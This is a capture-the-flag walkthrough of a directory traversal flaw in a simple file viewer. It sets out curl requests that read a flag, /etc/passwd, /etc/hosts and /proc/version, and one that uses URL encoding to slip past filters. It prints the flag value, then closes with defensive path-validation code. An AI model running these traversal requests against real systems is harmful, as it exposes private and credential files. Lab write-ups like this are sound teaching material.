This simple file viewer uses direct string concatenation to build file paths, creating the perfect opportunity for directory traversal attacks. 📁 Directory traversal is a fundamental web vulnerability that allows attackers to access files outside the intended directory, potentially exposing sensitive system files and configuration data. The application trusts user input without validation - a classic mistake that opens the door to file system exploitation! 🎯
Access the web application and explore its functionality:
curl -s http:///
The application is a "Simple File Viewer" that allows users to view text files. It shows available files: readme.txt, sample.txt, and info.txt.
Test the normal file viewing functionality:
curl -s "http:///view?file=readme.txt"
The application displays the file contents and shows the file path as "files/readme.txt", revealing how the path is constructed.
Examine how the file parameter is processed:
curl -s "http:///view?file=sample.txt"
The response shows "File Path: files/sample.txt", indicating direct string concatenation without validation.
Test for directory traversal using ../ sequences:
curl -s "http:///view?file=../flag.txt"
This attempts to access a file one directory level up from the files directory.
Successfully retrieve the flag using directory traversal:
# Extract the flag
curl -s "http:///view?file=../flag.txt" | grep -o '[0-9a-f]\{8\}-[0-9a-f]\{4\}-[0-9a-f]\{4\}-[0-9a-f]\{4\}-[0-9a-f]\{12\}'
The flag is revealed: cddc6bda-3d66-48e7-9848-6672afc2a5c8
Demonstrate accessing system files to show the full impact:
# Access system passwd file
curl -s "http:///view?file=../../etc/passwd"
This shows how directory traversal can be used to access sensitive system files.
Test multiple directory levels to understand the file system structure:
# Try different traversal depths
curl -s "http:///view?file=../../../etc/hosts"
curl -s "http:///view?file=../../../../proc/version"
This demonstrates how multiple ../ sequences can traverse deeper into the file system.
Test URL encoding to bypass potential filters:
# URL-encoded directory traversal
curl -s "http:///view?file=%2e%2e%2fflag.txt"
This shows how URL encoding (%2e%2e%2f for ../) can bypass basic input filters.
Observe how the application reveals the actual file paths:
curl -s "http:///view?file=../flag.txt" | grep "File Path:"
The response shows "File Path: files/../flag.txt", confirming the path construction method.
Confirm the directory traversal vulnerability allows arbitrary file access:
# Verify the vulnerability
curl -s "http:///view?file=../flag.txt" | grep "SYSTEM FLAG"
This confirms successful exploitation of the directory traversal vulnerability.
This challenge demonstrates a real directory traversal vulnerability where ../ sequences allow attackers to access files outside the intended directory. The vulnerability occurs because user input is directly concatenated into file paths without proper validation or sanitization. This can lead to unauthorized file access, information disclosure, and potential system compromise - making it a critical security vulnerability in web applications.
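As an added example (not code from the challenge or its application), the concatenation pattern the page describes is shown beside a hardened version that decodes the parameter once, resolves it against the base directory and rejects anything that resolves outside it. The base directory /srv/app/files and the helper names are assumptions for illustration.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Assumed location of the challenge's files/ directory (not given on the page).
BASE_DIR = "/srv/app/files"

def vulnerable_path(user_file: str) -> str:
    """The page's pattern: raw concatenation, so '../flag.txt' resolves
    to a file outside files/ once the OS normalises the path."""
    return "files/" + user_file

def safe_path(user_file: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Return the absolute path to serve, or None when the request must be
    rejected. Decode once, resolve against base_dir, then require that the
    resolved path is still a descendant of base_dir."""
    # Judge the decoded value, so %2e%2e%2f is seen as '../' and not as text.
    decoded = unquote(user_file)
    # NUL bytes and absolute paths are never valid file names here.
    if "\x00" in decoded or os.path.isabs(decoded):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # Containment check: the common prefix must be the base directory itself,
    # and the candidate must not be the directory (empty or '.' requests).
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def check_request(user_file: str) -> str:
    """One-word verdict suitable for a request log or a detection rule."""
    return "serve" if safe_path(user_file) else "reject (traversal or invalid name)"

if __name__ == "__main__":
    # Constructed inputs taken from the requests shown on this page.
    for f in ["readme.txt", "../flag.txt", "%2e%2e%2fflag.txt", "../../etc/passwd"]:
        print(f"{f!r:24} naive={vulnerable_path(f)!r:28} {check_request(f)}")
```

Note that checking for the literal substring "../" is not enough on its own: the containment test works on the resolved path, so it also covers encoded forms and deeper sequences such as ../../../../proc/version.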